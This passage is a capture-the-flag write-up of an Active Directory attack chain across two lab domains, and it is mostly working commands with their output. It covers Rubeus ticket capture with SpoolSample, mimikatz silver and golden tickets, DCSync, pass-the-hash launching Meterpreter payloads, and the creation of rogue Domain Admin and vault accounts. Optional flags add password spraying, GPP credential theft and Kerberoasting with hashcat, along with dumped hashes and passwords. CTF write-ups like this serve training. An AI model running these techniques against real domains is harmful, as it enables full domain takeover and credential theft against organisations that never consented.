## Step 1: from svc.neurosoft.ctf and loggued as SYSTEM
## Upload and start Rubeus
### Rubeus needs to be compiled with .NET 4.0 (not the default 3.5)
msf> sessions -i 5
meterpreter > cd C:\\temp
meterpreter > upload /payloads/vs_build/Rubeus.exe
meterpreter > shell
C:\temp>.\Rubeus monitor /interval:3
Background channel 1? [y/N] y
## Step 2: from dev.neurosoft.ctf and loggued as brandon.harper
## Download:
## Compile in Visual Studio
meterpreter > sessions 3
meterpreter > upload /payloads/vs_build/SpoolSample.exe
meterpreter > shell
C:\temp>.\SpoolSample.exe dc.neurosoft.ctf svc.neurosoft.ctf
Terminate channel 1? [y/N] y
## Step 3: from the same meterpreter than step 1
## Read Rubeus output
meterpreter > sessions 5
meterpreter > channel -i 1
Interacting with channel 1...
[+] 2019-10-15 1:54:01 PM - 4624 logon event for 'NEUROSOFT.CTF\DC$' from '9000:470:beef::10'
[*] Target LUID: 0x31f43
[*] Target service : krbtgt
UserName : DC$
Base64EncodedTicket :
doIFDjCCBQqgAwIBBaEDAgEWooIEFTCCBBFhggQNMIIECaADAgEFoQ8bDU5FVVJPU09GVC5DVEaiIjAgoAMCAQKhGTAXGwZrcmJ0Z3QbDU5FVVJPU09GVC5DVEajggPLMIIDx6ADAgESoQMCAQKiggO5BIIDtTFAZP4mD4iB8uHtu4jqeA5fQueLwpDi9ysiP4COp8is0ilfwXgbw6mf/yL9e4VBiteOU5cC7zyG1oizioIkBsesHViDmoJ4ugoQNhuN02XrxqSm64SfahKYSqe2Zyyok4CyNQbo+gBD+Q6ia6kYWkrCFomtJOwOWDh7Obdk7S9qVabbx8uhKCS0JLVpkF8OcfjKTqcHl+Y3xVE0M7jFFbndYy3F7kT5fzowqhINcZFuj2WFXFv4U8ciWEYsCru4TjDmt2vARepCv8CioK+mKKcFAfU4vcML6ekmB0vzGRrRbfhTwxAf/XgortYALiMzIL2AGfX80w4SAXJbUnxP+LDB4rZXAKS88biGHcd5YDGEcSiYcntFPgp4ghZPhuY6yBOnxgXosb4N9NgrynF+nWtB+0EhpN3K7T02Iv3AFWHTFNaujeg7RNYSYMOLIKRy+9FDqa+FFC8eEuYapgHv/CijgdPamNu5Vmw+j83OuE1suAvx8j29dcqomyunEAriecH0xmUIC/RUrQiBEjJFAOPnlszTjhrP80zIrvgGJIMicRcKZFIWS3A+gUal8zF+HydI+eCCycRD0570KaD5u7i3aS7PGSkeWSDbfNTA9rYEB45o3CLyirQsnQJRwAHFzEKEfJBO5iAWuFjq+cRM1haaZp/44tBJfUE0x7CT6Zlx095G5e6CMTbVx+Y6MW3p7KnSLhEjcqURWVq0aaINh0ntQ329B/L3ektmF/i4G4BCdozqv64yO1tqRlEvM1bQWHBgo54Xc+5303Slp8zOlviKyEPaslQpaWYUqq1XZZ4QqfGUzSyrCpGY1+EF66auFasXq97tZ3uu3RaDppZb3Dq4UwEEZRKjDUWTf0DmjfwOw9psqHkZZEPoN5PUHaJh94BC+Zu+Qz3cBQJ7SlHbQtfM+R5f76dEFMZm3HPZW/9uC0Kr0IVMKoO3Y5ipmUTcTx719O/f9X+XuEtAKywm8K18fEJh5vu1qSIkv3C8JnN5lVV+YA2lQ++ocX5EhOu1C3NkZ4R/M/L/qSy28LontMlpJ+wD8kAXnV6Hn/2LuFMqSK31qmlHipCkjJX5lFfJZ5cgQVY9KmPhk4QZ37aNd+DIxG64S0LxwsD2IUWTR7hHsr1+W6FtwwTZeXGmAYX8MGTXHQkDsUTB3BaoM+8jIc1nJtEht5DZB35RJNGPibkvoEbwo6/WPBuj9drhmptzk+r+X7+8I/OwqdIPVnNPa3CQTGIN339xmyBPtAeR44FgpWu2r12jgeQwgeGgAwIBAKKB2QSB1n2B0zCB0KCBzTCByjCBx6ArMCmgAwIBEqEiBCBsDLMnnKKamKNXf9gpgLBY7gssu2uNhlpBcqTmUQbK4aEPGw1ORVVST1NPRlQuQ1RGohAwDqADAgEBoQcwBRsDREMkowcDBQBgoQAApREYDzIwMTkxMDE1MTcyODUwWqYRGA8yMDE5MTAxNjAzMjg1MFqnERgPMjAxOTEwMjIxNzI4NTBaqA8bDU5FVVJPU09GVC5DVEapIjAgoAMCAQKhGTAXGwZrcmJ0Z3QbDU5FVVJPU09GVC5DVEY=[*] Extracted 1 total ticketsmeterpreter > shell
C:\temp>.\Rubeus.exe ptt /ticket:<the base64 ticket>
[*] Action: Import Ticket
[+] Ticket successfully imported!

Method 2 — Silver Ticket via a backup service (broken)

Steal BackupSVCUser ticket.

meterpreter > upload /payloads/mimikatz/mimi_x64.exe
meterpreter > shell
mimikatz # privilege::debug
mimikatz # sekurlsa::tickets /export
mimikatz # kerberos::ptt [0;6f015]-2–0–60a10000-BackupSVCUser@krbtgt-NEUROSOFT.CTF.kirbi

Access SVCbackups on dc.neurosoft.ctf. Get flag.txtand preDCbak folder content.

C:\temp>dir \\dc.neurosoft.ctf\SVCbackupsDirectory of \\dc.neurosoft.ctf\SVCbackups2019–03–23 03:25 PM <DIR> .
2019–03–23 03:25 PM <DIR> ..
2019–03–23 03:25 PM 35 flag.txt
2019–03–23 03:23 PM <DIR> preDCbak
1 File(s) 35 bytes
3 Dir(s) 44,482,936,832 bytes free

Copy registry files from preDCbak folder. Extract DC machine account hash with from impacket.

$ -system -security -sam LOCAL
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:db26062ffbf19e6492f4baa3a5109344

To build a silver ticket, the player first needed the domain SID. He could get it either with a shell command or with PowerView.

# From a shell
C:\temp>whoami /user
— — — — — — — — — —
User Name SID
neurosoft\... S-1–5–21–2892396748–947681171–1598779583–...
# From PowerView
PS > Get-DomainSID

Then, it was just a matter of assembling the pieces together. To perform a DCSYNC and retrieve the hash of krbtgt, the player needed to specify the ldapservice.

  • DC$ NTLM: fffbe1d239fff71c6fb5c2996def0f8e
  • Domain SID: S-1–5–21–2892396748–947681171–1598779583
  • Domain Name: neurosoft.ctf
  • Service: LDAP
  • User: whatever
  • ID: whatever

Then using mimikatz, the ticket could be forged and used to act as a DC.

mimikatz # kerberos::golden /admin:IPWNEDYOU /id:1106 /domain:neurosoft.ctf /sid:S-1–5–21–2892396748–947681171–1598779583 /target:dc.neurosoft.ctf /rc4:fffbe1d239fff71c6fb5c2996def0f8e /service:LDAP /pttmimikatz # lsadump::dcsync /dc:dc.neurosoft.ctf /domain:neurosoft.ctf /user:krbtgt

From the silver ticket, the player could escalate to a golden ticket.

  • krbtgt NTLM: dd7a591aa181dc43ed2f6a509411c95f
  • Domain SID: S-1–5–21–2892396748–947681171–1598779583
  • Domain Name: neurosoft.ctf
  • User: whatever
  • ID: whatever

Then using mimikatz:

mimikatz # kerberos::golden /domain:neurosoft.ctf /sid:S-1–5–21–2892396748–947681171–1598779583 /rc4:dd7a591aa181dc43ed2f6a509411c95f /user:GetRekt /id:500 /ptt
mimikatz # exit

Grab a flag on DC

The DC$ account does not have privileges on \\dc.neurosoft.ctf\c$.

C:\temp>klistCurrent LogonId is 0:0x3e7Cached Tickets: (1)#0> Client: DC$ @ NEUROSOFT.CTF
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x60a10000 -> forwardable forwarded renewable pre_authent name_canonicalize
Start Time: 10/15/2019 23:17:09 (local)
End Time: 10/16/2019 9:17:09 (local)
Renew Time: 10/22/2019 23:17:09 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0x1 -> PRIMARY
Kdc Called:
C:\temp>dir \\dc.neurosoft.ctf\c$
Access is denied.

PTH again and again…

# Get Administrator's account hash
mimikatz # lsadump::dcsync /dc:dc.neurosoft.ctf /domain:neurosoft.ctf /user:Administrator
* Primary:Kerberos-Newer-Keys *
Default Salt : NEUROSOFT.CTFAdministrator
Default Iterations : 4096
aes256_hmac (4096) : 74f5097d9ba3c07ea8f73fb6e613e77b782b6b2da53bab050c014db1faa2b5f9
aes128_hmac (4096) : f645bbe57528cd1a95bf06779dcc98b3
des_cbc_md5 (4096) : a2b92a85641ce0c7
# Spawn a shell with PTH
mimikatz # sekurlsa::pth /user:Administrator /domain:neurosoft.ctf /aes256:74f5097d9ba3c07ea8f73fb6e613e77b782b6b2da53bab050c014db1faa2b5f9 /run:payload_msf_x64.exe
## Change session
# Grab the flag
C:\temp>dir \\dc.neurosoft.ctf\c$
C:\temp>type \\dc.neurosoft.ctf\c$\flag.txt

Pop dc.neurosoft.ctf

By default, most network services are not enabled on Windows 2016. All tricks involving psexec and WMI did not work. The simplest approach at this point was to create a Domain Admin account and use RDP for the rest.

C:\temp>net user mdube FuckWindows1 /add /domain
C:\temp>net group “Domain Admins” mdube /add /domain
# Login using RDP
C:\temp>net use \\dev.neurosoft.ctf\c$
C:\temp>copy \\dev.neurosoft.ctf\c$\temp\payload_msf_x64.exe .\

Status at this point

Active sessions
Id Name Type Checkin? Enc? Local URI Information Connection
— — — — — — — — — — — — — — — — — — — — — — — — — — —
1 meterpreter x64/windows 39s ago Y ? DEV\brandon @ DEV fd00:1337:1:0:9eeb:e8ff:fe1c:ebaf:8081 -> 9000:470:beef::12:49720 (9000:470:beef::12)
2 meterpreter x86/windows 36s ago Y ? NT AUTHORITY\SYSTEM @ DEV fd00:1337:1:0:9eeb:e8ff:fe1c:ebaf:8080 -> 9000:470:beef::12:49721 (9000:470:beef::12)
3 meterpreter x64/windows 33s ago Y ? NT AUTHORITY\SYSTEM @ DEV fd00:1337:1:0:9eeb:e8ff:fe1c:ebaf:8081 -> 9000:470:beef::12:49722 (9000:470:beef::12)
4 meterpreter x64/windows 0s ago Y ? NEUROSOFT\brandon.harper @ DEV fd00:1337:1:0:9eeb:e8ff:fe1c:ebaf:8081 -> 9000:470:beef::12:49733 (9000:470:beef::12)
5 meterpreter x64/windows 12s ago Y ? NT AUTHORITY\SYSTEM @ SVC fd00:1337:1:0:9eeb:e8ff:fe1c:ebaf:8081 -> 9000:470:beef::11:49692 (9000:470:beef::11)
6 meterpreter x64/windows 3s ago Y ? NEUROSOFT\mdube @ DC fd00:1337:1:0:9eeb:e8ff:fe1c:ebaf:8081 -> 9000:470:beef::10:59974 (9000:470:beef::10)

Recon the second AD: dc01.nsresearch.ctf

From any shell running as a domain user, the player could enumerate the trust configuration.

meterpreter > powershell_execute Get-NetDomainTrust[+] Command execution completed:SourceName TargetName TrustType TrustDirection
— — — — — — — — — — — — — — — — — — — — — —
neurosoft.ctf nsresearch.ctf External Inbound
meterpreter > powershell_execute Invoke-MapDomainTrust[+] Command execution completed:SourceDomain : neurosoft.ctf
SourceSID :
TargetDomain : nsresearch.ctf
TargetSID :
TrustType : External
TrustDirection : Inbound

In the description field of the user VaultAccessAdm, the player could find a reference about OU Delegation and NSRESEARCH.

PS > Get-DomainUser -Properties sAMAccountName,descriptionsamaccountname  description
-Administrator Built-in account for administering the computer/domain
Guest Built-in account for guest access to the computer/domain
DefaultAccount A user account managed by the system.
kbrandon.harper QA / Developer
svcMoonCrackle Service Account
BackupSVCUser Backup service account
VaultAccessAdm User with nsresearch Vault OU admin delegation
neil.williamson President and co-founder
jerry.compass Developer

List nsresearch.ctf OUs

meterpreter > powershell_execute “Get-NetOU -domain nsresearch.ctf”[+] Command execution completed:
LDAP://dc.neurosoft.ctf/OU=Domain Controllers,DC=nsresearch,DC=ctf

List permissions on nsresearch Vault OU.

meterpreter > powershell_execute “Invoke-ACLScanner -domain nsresearch.ctf -DistinguishedName \”OU=Vault,OU=Research,DC=nsresearch,DC=ctf\””[+] Command execution completed:ObjectDN : OU=Vault,OU=Research,DC=nsresearch,DC=ctf
ObjectSID :
IdentitySID : S-1–5–21–2892396748–947681171–1598779583–1122
ActiveDirectoryRights : GenericAll
InheritanceType : Descendents
ObjectType : 00000000–0000–0000–0000–000000000000
InheritedObjectType : bf967aba-0de6–11d0-a285–00aa003049e2
ObjectFlags : InheritedObjectAceTypePresent
AccessControlType : Allow
IdentityReference : NEUROSOFT\VaultAccessAdm
IsInherited : False
InheritanceFlags : ContainerInherit
PropagationFlags : InheritOnly
ObjectDN : OU=Vault,OU=Research,DC=nsresearch,DC=ctf
ObjectSID :
IdentitySID : S-1–5–21–2892396748–947681171–1598779583–1122
ActiveDirectoryRights : CreateChild, DeleteChild
InheritanceType : All
ObjectType : bf967aba-0de6–11d0-a285–00aa003049e2
InheritedObjectType : 00000000–0000–0000–0000–000000000000
ObjectFlags : ObjectAceTypePresent
AccessControlType : Allow
IdentityReference : NEUROSOFT\VaultAccessAdm
IsInherited : False
InheritanceFlags : ContainerInherit
PropagationFlags : None
ObjectDN : OU=Vault,OU=Research,DC=nsresearch,DC=ctf
ObjectSID :
IdentitySID : S-1–5–21–2892396748–947681171–1598779583–1122
ActiveDirectoryRights : ReadProperty, WriteProperty
InheritanceType : Descendents
ObjectType : bf9679c0–0de6–11d0-a285–00aa003049e2
InheritedObjectType : bf967a9c-0de6–11d0-a285–00aa003049e2
ObjectFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
AccessControlType : Allow
IdentityReference : NEUROSOFT\VaultAccessAdm
IsInherited : False
InheritanceFlags : ContainerInherit
PropagationFlags : InheritOnly

More precisely, the player was looking for those fields.

meterpreter > powershell_execute “Invoke-ACLScanner -domain nsresearch.ctf -DistinguishedName \”OU=Vault,OU=Research,DC=nsresearch,DC=ctf\” | select ObjectDN,IdentityReference,ActiveDirectoryRights | format-table”
[+] Command execution completed:
ObjectDN IdentityReference ActiveDirectoryRights
— — — — — — — — — — — — — — — — — — — — — — — -
OU=Vault,OU=Research,DC=nsresearch,DC=ctf NEUROSOFT\VaultAccessAdm GenericAll
OU=Vault,OU=Research,DC=nsresearch,DC=ctf NEUROSOFT\VaultAccessAdm CreateChild, DeleteChild
OU=Vault,OU=Research,DC=nsresearch,DC=ctf NEUROSOFT\VaultAccessAdm ReadProperty, WriteProperty

In fact, the NEUROSOFT\VaultAccessAdm user had all privileges on the OU OU=Vault,OU=Research,DC=nsresearch,DC=ctf. By impersonating this user, the player could create new users in this OU. But first, what was in this OU?

PS > Get-DomainObject -SearchBase 'OU=Vault,OU=Research,DC=nsresearch,DC=ctf'whencreated           : 2019-03-31 2:55:51 PM
instancetype : 4
objectcategory : CN=Organizational-Unit,CN=Schema,CN=Configuration,DC=nsresearch,DC=ctf
oobjectguid : 51fcfc1c-147e-471b-8c33-dba40c72842e
whenchanged : 2019-04-17 1:58:04 AM
name : Vault
dusnchanged : 73349
objectclass : {top, organizationalUnit}
udscorepropagationdata : {2019-04-17 1:58:04 AM, 2019-04-17 1:55:31 AM, 2019-03-31 3:16:12 PM, 2019-03-31 2:55:51 PM...}
usncreated : 55862
gsamaccounttype : ALIAS_OBJECT
swhenchanged : 2019-04-23 1:40:06 AM
objectsid : S-1-5-21-1677815563-2680413571-3634247530-1124
objectclass : {top, group}
cusnchanged : 78753
dname : VaultAccess
description : Allow access to vault
distinguishedname : CN=VaultAccess,OU=Vault,OU=Research,DC=nsresearch,DC=ctf
whencreated : 2019-03-23 1:19:17 AM
instancetype : 4
objectguid : 4e5e235f-75a4-4ed4-9f97-6016a3b1a484
objectcategory : CN=Group,CN=Schema,CN=Configuration,DC=nsresearch,DC=ctf

In the OU, there was a group named VaultAccess. As the name suggests, members of this group were granted access to the Vault. To summarize, the player needed to impersonate NSRESEARCH\VaultAccessAdm, create a new user in OU OU=Vault,OU=Research,DC=nsresearch,DC=ctf and finally add it to the group NSRESEARCH\VaultAccess. Here’s how the player could do it.

mimikatz # kerberos::golden /domain:neurosoft.ctf /sid:S-1–5–21–2892396748–947681171–1598779583 /rc4:dd7a591aa181dc43ed2f6a509411c95f /user:GetRekt /id:500 /pttmimikatz # lsadump::dcsync /dc:dc.neurosoft.ctf /domain:neurosoft.ctf /user:VaultAccessAdm
[DC] ‘neurosoft.ctf’ will be the domain
[DC] ‘dc.neurosoft.ctf’ will be the DC server
[DC] ‘VaultAccessAdm’ will be the user account
Object RDN : VaultAccessAdm** SAM ACCOUNT **SAM Username : VaultAccessAdm
User Principal Name : VaultAccessAdm@neurosoft.ctf
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration :
Password last change : 2019–03–31 11:09:12 AM
Object Security ID : S-1–5–21–2892396748–947681171–1598779583–1122
Object Relative ID : 1122
Hash NTLM: 19388f61312f82718bf59f1d8feed067
ntlm- 0: 19388f61312f82718bf59f1d8feed067
lm — 0: 498af0f7c581ad67a180c5f86e8d7ff1

Load mimikatz and launch process as NEUROSOFT\VaultAccessAdm.

meterpreter > load kiwi
Loading extension kiwi…
.#####. mimikatz 2.1.1 20180925 (x64/windows)
.## ^ ##. “A La Vie, A L’Amour”
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( )
## \ / ## >
‘## v ##’ Vincent LE TOUX ( )
‘#####’ > / ***/
meterpreter > kiwi_cmd “\”sekurlsa::pth /user:VaultAccessAdm /domain:neurosoft.ctf /ntlm:19388F61312F82718BF59F1D8FEED067\””

Find and migrate to new process.

meterpreter > ps
2840 2476 conhost.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\conhost.exe
meterpreter > migrate 2840
[*] Migrating from 860 to 2840…
[*] Migration completed successfully.

Create new user and add a new user to the right group.

meterpreter > powershell_execute “New-ADUser -Name \”Hacked ByMe\” -SamAccountName hacker -UserPrincipalName hacker@nsresearch.ctf -path \”OU=Vault,OU=Research,DC=nsresearch,DC=ctf\” -AccountPassword (ConvertTo-SecureString -AsPlainText \”p@ssw0rd\” -Force) -enabled 1 -server dc01.nsresearch.ctf”meterpreter > powershell_execute “Add-ADGroupMember -Identity VaultAccess -Members hacker -server dc01.nsresearch.ctf”

At this stage, the new user could RDP connect to vault.nsresearch.ctf.

Recon on vault.nsresearch.ctf

Get a real Shell

Once connected, the player was prompted with a non-standard shell offering two options: Print Help or exit. That was not very handful.

RDP access to the vault

There is an old ugly trick in Windows, which have worked for many years, to prompt a real shell from a citrix or restricted RDP session. The player just had to press “Ctrl + alt + Delete”, choose “Task Manager”, then click File -> “Run new task” and then type “cmd” and click OK.

Understand the blocking policy

At first, the player could be surprised by the very strict policy. Powershell and most LOLBAS were blocked. Even notepad.exe was blocked.

Analyze the firewall

The player could run netsh to figure out that:

  • no outbound port is allowed, except with dc01.nsresearch.ctf which is not compromised;
  • only TCP/3389 was allowed inbound.
netsh advfirewall firewall show rule name=all direction=out
netsh advfirewall firewall show rule name=all direction=in

File Uploads

RDP Mount was restricted so files could hardly be uploaded on the box. There was no known way of uploading files to this machine.


Windows Defender was enabled with default settings.

C:\Windows\system32>tasklist /svc | findstr MsMpEng
MsMpEng.exe 1436 WinDefend

Find a vulnerable service

The same service from windows 10 (cortesc) could be found, with minor differences.

C:\Windows\system32>sc query cortescSERVICE_NAME: cortesc
WIN32_EXIT_CODE : 0 (0x0)
C:\Windows\system32>sc qc cortesc
[SC] QueryServiceConfig SUCCESS
BINARY_PATH_NAME : "C:\Program Files\NSSM\nssm_64.exe"
TAG : 0
DISPLAY_NAME : cortesc

By browsing to C:\Program Files\VaultAccess, the player could find few files, such as cortesc.bat.

C:\Program Files\VaultAccess>dir
Volume in drive C has no label.
Volume Serial Number is 129B-E701
Directory of C:\Program Files\VaultAccess2019–03–29 10:33 PM <DIR> .
2019–03–29 10:33 PM <DIR> ..
2019–03–27 10:23 PM 19 cortesc.bat
2019–03–31 09:24 AM 1,469 login.bat
2019–05–09 02:40 AM 62 login_logs.txt
3 File(s) 1,550 bytes
2 Dir(s) 45,918,384,128 bytes free

Again with icacls, the player could find that NSRESEARCH\VaultAccess group had Modify permissions on this file.

C:\Program Files\VaultAccess>icacls cortesc.bat
cortesc.bat NSRESEARCH\VaultAccess:(I)(M)
Successfully processed 1 files; Failed processing 0 files

Escalate to Local Admin on vault.nsresearch.ctf

The participant COULD NOT create its own user because local users were not allowed to RDP, even if they were in the Administrators group. For example, the following did not work.

net user god FuckWindows1 /add
net localgroup Administrators god /add

Instead, the following worked.

net localgroup Administrators NSRESEARCH\mdube /add

Then logout/login with the same user but as admin. The final flag was located here:C:\flag.txt.


[Optional] Password vulnerability flags

Because password is an awesome invention (and one of the main reason why infosec is broken), we have put in place 8 different vulnerabilities related to passwords. Those were not required to complete the track but they provided 8 flags. See them as Heart Piece in Zelda Ocarina of time: They would make you stronger.

1. Password Reuse
2. Known welcome password
3. Password in description fields
4. Guessable password (pattern with the company name)
5. Password not required
6. Password stored in a reversible format
7. Group Policy Preferences (GPP)
8. Kerberoast (Service account with a weak password)

1. Password reused (ns_support)

In the environment, two users shared the same password. The local account DEV\ns_support shared the same password than NSRESEARCH\zim.armstrong.

There was a hint in the user’s description.

C:\temp>WMIC useraccount get name,descriptionDescription                                                                                      Name                
Built-in account for administering the computer/domain Administrator
A user account managed by the system. DefaultAccount
Built-in account for guest access to the computer/domain Guest
Support account created by Zim Armstrong ns_support
A user account managed and used by the system for Windows Defender Application Guard scenarios. WDAGUtilityAccount

The player first needed to root the windows 10 box (dev.neurosoft.ctf) and then extract SAM (ns_support:3b5326ade5e02db737b2a9cee8ae1af3).

meterpreter > load kiwi
meterpreter > lsa_dump_sam
[+] Running as SYSTEM
[*] Dumping SAM
Domain : DEV
RID : 000003eb (1003)
User : ns_support
Hash NTLM: 3b5326ade5e02db737b2a9cee8ae1af3

Then, the player could attempt password spray on all users.

msf > use scanner/smb/smb_login
msf > set USER_FILE nsec/lists/users.txt
msf > set SMBDomain NSRESEARCH
msf > set RHOSTS 9000:470:beef:cafe:cafe::20
msf > set SMBPass 00000000000000000000000000000000:3b5326ade5e02db737b2a9cee8ae1af3
msf > run

The flag could be found on the user share.

$ -hashes 00000000000000000000000000000000:3b5326ade5e02db737b2a9cee8ae1af3 -target-ip 9000:470:beef:cafe:cafe::20 NSRESEARCH/zim.armstrong@files.nsresearch.ctf
# use users_data
# cd zim.armstrong
# get flag.txt
# exit
$ cat flag.txt

2. Known Welcome Password (Alfred Lebrun)

The hint could be found in brandon.harper’s mailbox.

From: Security <security@neurosoft.ctf>
To: Brandon Harper <brandon.harper@neurosoft.ctf>
Date: Mon, 26 Dec 2018 13:11:15 -0400
Subject: New account in NSRESEARCH
This is an automated message from security.Your new account in the highly secured NSRESEARCH domain was created successfully.Here is your temporary password: Welcome1Here is your home folder: \\files.nsresearch.ctf\users_data\brandon.harperYour password must be changed before first use.Thank you,

However, brandon was not vulnerable. The email just leaked the reused welcome password vulnerability. The player needed to do a password spray on all users to find it.

msf > use auxiliary/scanner/smb/smb_login
msf > set USER_FILE nsec/lists/users.txt
msf > set SMBDomain NSRESEARCH
msf > set SMBPass Welcome1
msf > set RHOSTS 9000:470:beef:cafe:cafe::20
msf > run

However, the user’s password needed be changed before use. Here’s how the player could solve it.

meterpreter > powershell_shell
PS > $oldpass = ‘Welcome1’
PS > $newpass = ‘MyNewPass1MyNewPass1’
PS > $user = [ADSI]”LDAP://dc01.nsresearch.ctf/CN=Alfred Lebrun,OU=Users,OU=Research,DC=nsresearch,DC=ctf”
PS > $user.ChangePassword($oldpass,$newpass)

The flag could be found on the user share.

meterpreter > shell
C:\temp>net use \\files.nsresearch.ctf\users_data /user:NSRESEARCH\alfred.lebrun MyNewPass1MyNewPass1
C:\temp>dir \\files.nsresearch.ctf\users_data
C:\temp>dir \\files.nsresearch.ctf\users_data\alfred.lebrun
C:\temp>type \\files.nsresearch.ctf\users_data\alfred.lebrun\flag.txt
C:\temp>net use \\files.nsresearch.ctf\users_data /delete

3. Password in description field (test.user)

There was a flag in the description field of a user. The player could easily find it during the AD reconnaissance phase.

meterpreter > load powershell
meterpreter > powershell_import /home/mdube/shr/git/PowerSploit/Recon/PowerView.ps1
meterpreter > powershell_execute “Get-DomainUser -Domain NSRESEARCH.CTF -Properties sAMAccountName,Description”

The flag could be found on the user share.

C:\temp>net use \\files.nsresearch.ctf\users_data /user:NSRESEARCH\test.user “Th4tSup3rUncr4ck4bl3P@$$w0rd”
C:\temp>dir \\files.nsresearch.ctf\users_data
C:\temp>dir \\files.nsresearch.ctf\users_data\test.user
C:\temp>type \\files.nsresearch.ctf\users_data\test.user\flag.txt
C:\temp>net use \\files.nsresearch.ctf\users_data /delete

4. Guessable Password (Linda Costa)

A user’s password was constructed from the company name and a very common suffix. In fact, there was a very explicit hint about it in brandon.harper’s mailbox.

From: Security <security@neurosoft.ctf>
To: Brandon Harper <brandon.harper@neurosoft.ctf>
Date: Tue, 5 Feb 2019 13:21:15 -0400
Subject: Password Policy Notice
Good day Developers,Recently, a user account was compromised and we discovered that he was using the company name as a password. We would like to inform that this is a very inappropriate security practice. We hope that nobody use such weak passwords. In addition, please note that appending “123” does not improve the security posture of your passwords.Thank you for your cooperation

The player could attempt password spray on all users.

msf > use auxiliary/scanner/smb/smb_login
msf > set USER_FILE nsec/lists/users.txt
msf > set SMBDomain NSRESEARCH
msf > set SMBPass Neurosoft123
msf > set RHOSTS 9000:470:beef:cafe:cafe::20
msf > run
# Spray via rpcclient (if you feel funky)
while read x; do echo $x; rpcclient -U “NSRESEARCH/$x%Neurosoft123” -c “getusername;quit” 9000:470:beef:cafe:cafe::20; done < ~/nsec/users.txt

The flag could be found on the user share.

C:\temp>net use \\files.nsresearch.ctf\users_data /user:NSRESEARCH\linda.costa “Neurosoft123”
C:\temp>dir \\files.nsresearch.ctf\users_data
C:\temp>dir \\files.nsresearch.ctf\users_data\test.user
C:\temp>type \\files.nsresearch.ctf\users_data\test.user\flag.txt
C:\temp>net use \\files.nsresearch.ctf\users_data /delete

5. Password Not Required (Stuart Fagan)

Identify the vulnerability.

meterpreter > powershell_shell
PS > Get-DomainUser -Domain NSRESEARCH.CTF -LDAPFilter ”(&(!(useraccountcontrol:1.2.840.113556.1.4.803:=2))(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=32))” -Properties sAMAccountName,description,useraccountcontrol

The flag could be found on the user share.

C:\temp>net use \\files.nsresearch.ctf\users_data /user:NSRESEARCH\stuart.fagan “”
C:\temp>dir \\files.nsresearch.ctf\users_data
C:\temp>dir \\files.nsresearch.ctf\users_data\stuart.fagan
C:\temp>type \\files.nsresearch.ctf\users_data\stuart.fagan\flag.txt
C:\temp>net use \\files.nsresearch.ctf\users_data /delete

6. Password stored in a reversible format (Neil Williamson)

Identify the vulnerability.

meterpreter > powershell_shellPS > Get-DomainUser -Domain NEUROSOFT.CTF -LDAPFilter ”(&(objectClass=user)(objectCategory=user)(userAccountControl:1.2.840.113556.1.4.803:=128))” -Properties sAMAccountName,description,useraccountcontrol | format-table

Because the password is stored in a reversible format, the player could do a DCSYNC to grab the password.

meterpreter > load kiwi
meterpreter > kiwi_cmd “\”lsadump::dcsync /domain:neurosoft.ctf /user:neil.williamson\””
[DC] ‘neurosoft.ctf’ will be the domain
[DC] ‘dc.neurosoft.ctf’ will be the DC server
[DC] ‘neil.williamson’ will be the user account
Object RDN : Stuart Fagan** SAM ACCOUNT **SAM Username : neil.williamson
User Principal Name : neil.williamson@neurosoft.ctf
Account Type : 30000000 ( USER_OBJECT )
Account expiration :
Password last change : 2019–04–15 8:50:28 PM
Object Security ID : S-1–5–21–2892396748–947681171–1598779583–1123
Object Relative ID : 1123
* Primary:CLEARTEXT *

The flag could be found on the user share.

C:\temp>net use \\files.nsresearch.ctf\users_data /user:NSRESEARCH\neil.williamson “K89A3Fib6mYNiQDKtvsn”
C:\temp>dir \\files.nsresearch.ctf\users_data
C:\temp>dir \\files.nsresearch.ctf\users_data\neil.williamson
C:\temp>type \\files.nsresearch.ctf\users_data\neil.williamson\flag.txt
C:\temp>net use \\files.nsresearch.ctf\users_data /delete

7. Group Policy Preferences (GPP)

This one was a given.

metapsloit > use windows/gather/credentials/gpp
metapsloit > set SESSION X
metapsloit > run

[*] Parsing file: \\DC.NEUROSOFT.CTF\SYSVOL\neurosoft.ctf\Policies\{768F05A6-B3A6–4065–9158–27711C5E1844}\MACHINE\Preferences\Groups\Groups.xml …
[+] Group Policy Credential Info
Name Value
— — — — -
TYPE Groups.xml
DOMAIN neurosoft.ctf
CHANGED 2019–03–17 19:09:48
[+] XML file saved to: /home/mdube/.msf4/loot/20190416202934_default_9000470beef12_microsoft.window_971844.txt

8. Kerberoast (svcMoonCrackle)

Identify the vulnerability (As any user of neurosoft.ctf).

PS > Invoke-KerberoastSamAccountName       : svcMoonCrackle
DistinguishedName : CN=svcMoonCrackle,OU=Employees,DC=neurosoft,DC=ctf
ServicePrincipalName : http/mooncrackle.neurosoft.ctf
TicketByteHexStream :
Hash : $krb5tgs$23$*svcMoonCrackle$neurosoft.ctf$http/mooncrackle.neurosoft.ctf*$B6981E78424F52160E2F54

Crack the precious.

hashcat -m 13100 shr/git/nsec19/kerberoast/mooncrackle.hashcat.txt /usr/share/dict/rockyou.txt

Session……….: hashcat
Status………..: Cracked
Hash.Type……..: Kerberos 5 TGS-REP etype 23
Hash.Target……: $krb5tgs$23$*svcMoonCrackle$neurosoft.ctf$http/moon…682c09
Time.Started…..: Tue Apr 16 20:42:17 2019 (2 secs)
Time.Estimated…: Tue Apr 16 20:42:19 2019 (0 secs)
Guess.Base…….: File (/usr/share/dict/rockyou.txt)
Guess.Queue……: 1/1 (100.00%)
Speed.#1………: 7780.6 kH/s (8.09ms) @ Accel:512 Loops:1 Thr:64 Vec:1
Recovered……..: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress………: 12189696/14344373 (84.98%)
Rejected………: 0/12189696 (0.00%)
Restore.Point….: 11993088/14344373 (83.61%)
Restore.Sub.#1…: Salt:0 Amplifier:0–1 Iteration:0–1
Candidates.#1….: romanuik47 -> salvibabe1
Hardware.Mon.#1..: Temp: 59c Util: 47% Core:1657MHz Mem:3504MHz Bus:16

The flag could be found on the user share.

